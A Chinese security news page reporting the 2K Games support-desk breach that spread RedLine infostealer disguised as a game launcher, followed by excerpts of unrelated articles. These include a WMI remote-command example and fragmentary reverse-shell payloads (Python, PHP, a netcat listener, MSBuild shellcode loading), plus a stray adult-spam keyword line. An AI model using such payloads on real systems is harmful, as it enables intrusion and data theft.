<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    2K Games公告:其支持社區遭黑客入侵 請勿打開相關電子郵件

    VSole2022-09-22 06:51:18

    就在 1 天前,該開發商旗下的 Rockstar 確認遭到黑客入侵,導致《GTA VI》的大量開發數據被竊取并在網絡上曝光。雖然目前并沒有證據表明本次 2K 入侵事件和此前的 Rockstar 事件存在關聯,但是這兩者均隸屬于 Take-Two Interactive。對于母公司的安全記錄來說,這是一個特別具有破壞性的一周。

    2K Games 是眾多熱門系列游戲的發行商,涵蓋體育、射擊和動作類型,包括《無主之地》、《生化奇兵》、《文明》以及 NBA 2K 和 WWE 2K 系列。總的來說,這些游戲已售出數億套:截至 2021 年,僅《NBA 2K》系列就已售出 1.12 億份。

    根據 Bleeping Computer 的報道,周二,許多 2K 客戶收到了電子郵件,其中提到了他們尚未創建的 Zendesk 支持票證。電子郵件中附有 zip 文件,其中包含標記為 2K 游戲新啟動器的可執行程序,但實際上包含被稱為 RedLine 的信息竊取惡意軟件。

    2k
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    10月6日,2K開始聯系那些信息被竊取并被出售的客戶。
    就在 1 天前,該開發商旗下的 Rockstar 確認遭到黑客入侵,導致《GTA VI》的大量開發數據被竊取并在網絡上曝光。雖然目前并沒有證據表明本次 2K 入侵事件和此前的 Rockstar 事件存在關聯,但是這兩者均隸屬于 Take-Two Interactive。2K Games 是眾多熱門系列游戲的發行商,涵蓋體育、射擊和動作類型,包括《無主之地》、《生化奇兵》、《文明》以及 NBA 2K 和 WWE 2K 系列。總的來說,這些游戲已售出數億套:截至 2021 年,僅《NBA 2K》系列就已售出 1.12 億份。
    首先,簡單介紹一下WMI, WMI是Windows 2K/XP管理系統的核心;對于其他的Win32操作系統,WMI是一個有用的插件。WMI以CIMOM為基礎,CIMOM即公共信息模型對象管理器,是一個描述操作系統構成單元的對象數據庫,為MMC和腳本程序提供了一個訪問操作系統構成單元的公共接口。總的來說,就是一個很方便我們獲取系統信息的接口。@# process call create "cmd.exe /c whoami > c:\test.txt". 但是,目前來說這種方法存在三個缺點:1.不支持通過hash執行命令。
    在此次數據泄露事件中,NBA尚未公布泄露的數據量和涉及影響范圍。但不少粉絲稱,收到了NBA發送的“網絡安全事件通知”電子郵件,并指出NBA的系統沒有遭到破壞,數據已泄露的球迷的憑證也沒有受到影響。目前,就此次數據泄露事件,NBA已經聘請了外部網絡安全專家,以及第三方服務提供商一起,正在進行相應的調查,并分析判斷影響范圍。目前該帖子已被發布者刪除。
    2K次日警告用戶,威脅分子使用未經授權的訪問權,向一些用戶發送含有惡意鏈接的電子郵件。出于謹慎考慮,2K鼓勵所有玩家重置帳戶密碼,并確保已啟用了多因素身份驗證。
    每一個被發送出的IP信息包都有一個TTL域,該域被設置為一個較高的數值。當信息包在網絡中被傳輸時,TTL的域值通過一個路由器時遞減1;當TTL 遞減到0時,信息包被路由器拋棄。
    在用k8s時,經常會用到ingress暴露服務。 ingress可以簡單地理解成類似nginx的反向代理,可以根據配置將流量路由到不同的后端。 在"云廠商國內虛機上的k8s集群"中使用ingress會遇到兩個小問題: ingress配置中,必須使用域名,而不能使用ip 云廠商會檢查域名是否備案
    你加密的壓縮包比你想象中的還不安全! 哪怕對于信息安全人員來說,很多時候給壓縮包加上一個密碼就以為的是萬事大吉了。但事實是,很多情況下,你的加密壓縮包,遠遠沒有你想象的安全。
    在我們滲透測試的過程中,最常用的就是基于tcp/udp協議反彈一個shell,也就是反向連接。我們先來講一下什么是正向連接和反向連接。centos執行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 這個payload是反向連接并且只支持Linux,Windows可以參考離別歌師傅的python windows正向連接后門。這樣會把目標機的/bin/bash反彈給攻擊機但是很多Linux的nc很多都是閹割版的,如果目標機器沒有nc或者沒有-e選項的話,不建議使用nc的方式.PHP攻擊機監聽nc -lvvp 4444. 要求目標機器有php然后執行php -r '$sock=fsockopen;exec;'. 加載64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类